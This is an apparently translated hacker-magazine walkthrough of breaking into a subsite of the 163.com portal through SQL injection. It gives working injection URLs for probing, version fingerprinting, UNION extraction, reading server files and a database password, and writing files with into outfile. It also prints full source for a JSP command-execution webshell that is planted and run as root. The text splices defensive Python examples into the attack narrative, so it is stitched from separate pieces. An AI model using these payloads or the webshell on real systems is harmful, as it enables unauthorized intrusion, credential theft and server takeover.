This article was published in Hacker X-Files
By Jianxin [B.C.T]
Please credit the source when reprinting
163.com is a well-known portal website in China that provides all kinds of services, including email. Who knows where a vulnerability might be hiding! I recently learned a little about injection and wanted to run a small security check on these portal sites, to see whether their scripts are as strong as their reputation!
Without further ado, let's go to the pages that pass parameters and check whether any parameter is left unfiltered; then we can dig in. NetEase's scripts are basically JSP and PHP. The main site looks static, so ignore it; the other subsites should have plenty of JSP and PHP pages. I haven't studied PHP injection much, and being blocked by PHP's escaping in the middle of an injection is quite annoying, so I went straight to the JSP scripts, hoping to find an unfiltered parameter. After a couple of rounds of CS I really did find a page: http://XXX.163.com/wap/content.jsp?id=120. Haha, that looks like a numeric variable! I like unfiltered numeric variables, because if they can be injected there is basically no obstacle. Let's see whether it can be injected. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=1
Returns normal.
Then submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2
A bunch of JSP errors is returned (Figure 2).
The error message also reveals the web root path, and the path tells us this is a Linux system.
Based on the two tests above, this is very likely an injection point, because the "and 1=1" and "and 1=2" we submitted were executed as SQL. If the parameter is not filtered, we can submit our injection code here. Let's continue! Since JSP can be used with many databases, let's find out which one this is. Submit:
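The two requests above behave differently because the value of id is pasted straight into the SQL statement. The following Python/sqlite3 program is an added example (not code from this article or from 163.com): it reproduces that flaw against a constructed table and shows the parameterized fix. The table name, columns, rows and function names are assumptions; sqlite3 stands in for MySQL.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the content table behind content.jsp (an assumption,
    not 163.com's real schema); sqlite3 plays the role of MySQL here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO content VALUES (?, ?, ?)",
        [(120, "item 120", "normal page content"), (121, "item 121", "another item")],
    )
    conn.commit()
    return conn


def content_vulnerable(conn, id_param):
    """The flaw the article exploits: the id parameter is concatenated into the SQL
    text, so 'and 1=1', 'and 1=2' and a trailing UNION are all executed as SQL."""
    sql = "SELECT title, body FROM content WHERE id=" + id_param
    return conn.execute(sql).fetchone()


def content_bound(conn, id_param):
    """Fix 1: bind the value. The whole string is compared with id as one value,
    so no part of it is ever parsed as SQL."""
    sql = "SELECT title, body FROM content WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchone()


def content_safe(conn, id_param):
    """Fix 2: also validate the numeric type up front, so bad input is rejected with
    a clean application error instead of a database error that leaks paths and versions."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        raise ValueError("id must be a positive integer")
    sql = "SELECT title, body FROM content WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # The probes from the article: the vulnerable query answers them, the bound one does not.
    for probe in ("120", "120 and 1=1", "120 and 1=2", "120 and 1=2 union select 'a','b'/*"):
        print(repr(probe), "->", content_vulnerable(db, probe), "| bound:", content_bound(db, probe))
```

With binding alone the "and 1=1" probe simply finds no row, so the boolean test that opens the article gives the attacker nothing; the numeric check on top turns the database error that leaked the web root into a plain application error.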
http://XXX.163.com/wap/content.jsp?id=120/*
Normal result returned (Figure 3).
So the /* comment is supported, which suggests a MySQL database. Now that we know it's MySQL, let's check the version; if it is later than 4.0, that will be a great help for guessing tables and injecting. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and ord(mid(version(),1,1))>51/*
If a normal result is returned, the version is later than 4.0, which means UNION queries are supported. The statement takes the first character of the version string and checks that it is greater than '3'; 51 is the ASCII code of '3'. Since UNION is supported, let's find out the number of fields. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1/*
Error returned (Figure 4).
Continue submitting:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2/*
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3/*
......
up to http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,6,7,8,9,10/*
Normal result returned (Figure 5).
The page displays 10 fields! Now we can run UNION queries; let's look at the database information. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ...,5,user(),database(),version()/*
Result returned (Figure 6).
Now we know the database name, the connecting user, and the exact database version. What next? Look at this user; it may be an administrator or some other role. First check whether its privileges are large enough; the key question is whether it can read and write files. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ...,5,user(),database(),10 into outfile '/tmp/jnc.txt'/*
Hey, note that this is different from PHP injection: JSP does not escape any submitted characters, so we can submit the quotes with confidence. From the earlier result we know the system is Linux, and /tmp is generally writable, so we write the file to /tmp/jnc.txt. Then submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ...,5,user(),database(),load_file('/tmp/jnc.txt')/*
Result returned (Figures 7 and 8).
It seems both the file write and the file read succeeded, so this user has the FILE privilege. In a JSP environment you can write files as far as the permissions allow, without being hampered by PHP's escaping. Now that we have that privilege, let's check whether the web server and the MySQL server are the same host; if so, we can skip the headache of guessing passwords. Since the web path has already leaked, we try to read a file from the web server; if that works, they should be one host. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ...,5,user(),database(),load_file('/home/project/web163/web/content.jsp')/*
Our content.jsp is read back, haha (Figure 9). Success! After reading a few more files successfully, it's clear this is one and the same server. Now we're in business, keep reading! Of course the password is what we are interested in. Looking at the source just returned, we see that it includes function.jsp, so we read function.jsp. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ...,5,user(),database(),load_file('/home/project/web163/web/function.jsp')/*
Result returned (Figure 10).
Haha, check the source and there is the password! With the password in hand, let's try connecting: open your MySQL client and enter the obtained password. Result (Figure 11):
MySQL rejects logins from other IP addresses! Although we cannot connect to MySQL, we still have the injection point and can read and write files, so let's carry on from the script side.
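Every request above leaves a distinctive trail in the web server's access log, which is how an administrator would notice this activity. The following Python program is an added example (not part of the article): it parses Apache common-format log lines, tags each request with the injection phase it matches (boolean probe, comment truncation, UNION, fingerprint functions, into outfile, load_file) and summarizes the phases per source IP. The log lines are constructed for the example; the IP address, timestamps and sizes are invented.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Apache common format). The requests mirror the
# steps described in the article; the IP, timestamps and sizes are invented.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2005:12:00:01 +0800] "GET /wap/content.jsp?id=120 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2005:12:00:07 +0800] "GET /wap/content.jsp?id=120%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2005:12:00:12 +0800] "GET /wap/content.jsp?id=120%20and%201=2 HTTP/1.1" 500 2210',
    '203.0.113.5 - - [10/Oct/2005:12:01:30 +0800] "GET /wap/content.jsp?id=120%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10/* HTTP/1.1" 200 4870',
    '203.0.113.5 - - [10/Oct/2005:12:02:02 +0800] "GET /wap/content.jsp?id=120%20and%201=2%20union%20select%201,2,3,4,5,user(),database(),version(),9,10/* HTTP/1.1" 200 4910',
    '203.0.113.5 - - [10/Oct/2005:12:03:15 +0800] "GET /wap/content.jsp?id=120%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20into%20outfile%20%27/tmp/jnc.txt%27/* HTTP/1.1" 200 4870',
    '203.0.113.5 - - [10/Oct/2005:12:03:40 +0800] "GET /wap/content.jsp?id=120%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,load_file(%27/tmp/jnc.txt%27)/* HTTP/1.1" 200 4890',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures in the order an intruder following the article would trip them.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-truncation", re.compile(r"/\*|--\s")),
    ("union-select", re.compile(r"\bunion\b[\s/*]*\bselect\b", re.I)),
    ("db-fingerprint", re.compile(r"\b(version|user|database)\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
]


def classify(url):
    """Return the signature names matched by one request URL (decoded first,
    so %20-encoded spaces and %27 quotes do not hide the keywords)."""
    decoded = unquote_plus(url)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan(lines):
    """Parse log lines and keep (ip, url, status, tags) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["url"])
        if tags:
            hits.append((m["ip"], m["url"], int(m["status"]), tags))
    return hits


def summarize(hits):
    """Per source IP, the distinct phases seen, in the order they first appeared.
    A single IP walking from probe to file-write within minutes is the escalation to alert on."""
    phases = {}
    for ip, _url, _status, tags in hits:
        seen = phases.setdefault(ip, [])
        for tag in tags:
            if tag not in seen:
                seen.append(tag)
    return phases


if __name__ == "__main__":
    for ip, url, status, tags in scan(SAMPLE_LOG):
        print(status, ip, ",".join(tags), url)
    print(summarize(scan(SAMPLE_LOG)))
```

The 500 on the "and 1=2" request is itself a useful signal: a numeric id that produces a database error instead of a 404 is exactly the symptom the article relies on, and an error page that hides the stack trace would also have kept the web root path private.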
Now that we know the web path and can write files, can we use into outfile to export a webshell? Let's try it. Submit:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ... into outfile '/home/project/web163/web/JNC.jsp'/*
However, the result was quite depressing: writing to /tmp/ works fine, but writing to the web directory does not. I tried many times, and it seems to be a permission issue. One of Linux's big advantages is that permissions are set properly: by default only the owner can modify a file, and the user we are running as is mysql, so of course it cannot create files in Apache's directory. The intrusion has hit its first obstacle, with no solution for the moment.
We do script security, so when there is no other way, go back to the scripts! Adding /admin to the root directory gives "403 Forbidden". Haha, this is the management directory! So I eagerly submitted login.jsp, login.html and every other backend login filename I could think of, but the server returned 404 for all of them, which is depressing. I tried to get inspiration from other backends and guess the login path, but I still could not find the backend login file. That path leads nowhere.
Time to stop and think. After listening to a Jay Chou song, it occurred to me that Linux servers are secure, but what about human error? On other sites I often see that, besides the usual directories, the administrator also sets up a test directory so other administrators can debug scripts, and that directory is usually set to 777, that is, readable and writable by everyone. If such a directory exists...... go to the site and submit:
http://XXX.163.com/test/
404, does not exist.
http://XXX.163.com/wap/test/
403 Forbidden, haha. What a lucky break! Submit right away:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select ... into outfile '/home/project/web163/web/test/jnc.txt'/*
Access http://XXX.163.com/wap/test/jnc.txt (Figure 12).
Haha! It looks like I've found a real security risk. That's experience! OK, it can be exported as a TXT file; what about a PHP file? I exported a Trojan as a PHP file, but accessing it just prompted a download. It seems this web directory only handles the JSP suffix, so we can only export a JSP file. So I went and found the shortest JSP backdoor:
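The world-writable test directory is the lapse that turns a file-write privilege into code execution, and it is something an administrator can find before anyone else does. The following Python program is an added example (not part of the article): it walks a web root, reports every directory that is writable by everyone (the 777 setting described above) and lists any server-executable files sitting inside such a directory. The sample tree it builds in a temporary folder is constructed for the demo and is an assumption, not 163.com's real layout.

```python
import os
import stat
import tempfile

# Extensions the web server would execute; adjust to the container in use (assumption).
SERVER_EXECUTABLE = {".jsp", ".jspx", ".php", ".cgi"}


def find_world_writable(web_root):
    """Return (relative_dir, mode, sticky, executable_files) for every directory under
    web_root whose mode grants write access to 'other'. The sticky bit is reported
    separately because a sticky world-writable directory still lets anyone create files."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        mode = os.stat(dirpath).st_mode
        if mode & stat.S_IWOTH:
            hot = sorted(
                f for f in filenames if os.path.splitext(f)[1].lower() in SERVER_EXECUTABLE
            )
            findings.append((
                os.path.relpath(dirpath, web_root),
                oct(stat.S_IMODE(mode)),
                bool(mode & stat.S_ISVTX),
                hot,
            ))
    return findings


def build_sample_tree():
    """Constructed sample web root: a normal wap/ directory and a 777 wap/test/ directory
    that already contains a stray .jsp file. Layout and names are assumptions."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "wap", "test"))
    os.chmod(os.path.join(root, "wap"), 0o755)
    os.chmod(os.path.join(root, "wap", "test"), 0o777)
    for name in ("wap/content.jsp", "wap/test/jnc.txt", "wap/test/jnc.jsp"):
        with open(os.path.join(root, *name.split("/")), "w") as fh:
            fh.write("")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, mode, sticky, hot in find_world_writable(root):
        flag = " (sticky)" if sticky else ""
        print(f"{rel}: mode {mode}{flag}; executable files: {hot or 'none'}")
```

Run it against the real document root as part of a periodic check; a directory that must stay writable for debugging should at least live outside the document root, and the same audit is worth pairing with a review of which MySQL account holds the FILE privilege, since the two together are what made the export possible here.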
<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char) c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
Can we then execute commands by visiting JNC.jsp?cmd=command? Because we export the file with into outfile inside a UNION query, the exported content must sit at the end of the UNION, otherwise we won't get our result. Before exporting, we write the JSP code on a single line, which does not affect JSP execution but makes the export easier. Looking at it, the string is rather long and GET may not accommodate it, so write our own HTML form:
<form action="http://XXX.163.com/wap/content.jsp" method="post">
<input name="id" type="text" size="1000">
<input type="submit">
</form>
Then enter in the submission field:
120 and 1=2 union select 1,2,3,4,5,6,7,8,9,'one-line Trojan statement written here' into outfile '/home/project/web163/web/test/JNC.jsp'/* (Figure 13)
Click Submit and go to the test directory. Haha, our Trojan is really there! Submit:
http://XXX.163.com/wap/test/jsp3.jsp?cmd=id
Result returned (Figure 14).
Haha, it is running as root, the highest privilege! That saves us the privilege escalation. At this point, the security check of 163.com is complete!
From the example above we can see that one small unfiltered parameter, combined with a few other security lapses, can lead to the fall of the whole server. Not only the 163.com administrators but all administrators should take note of this.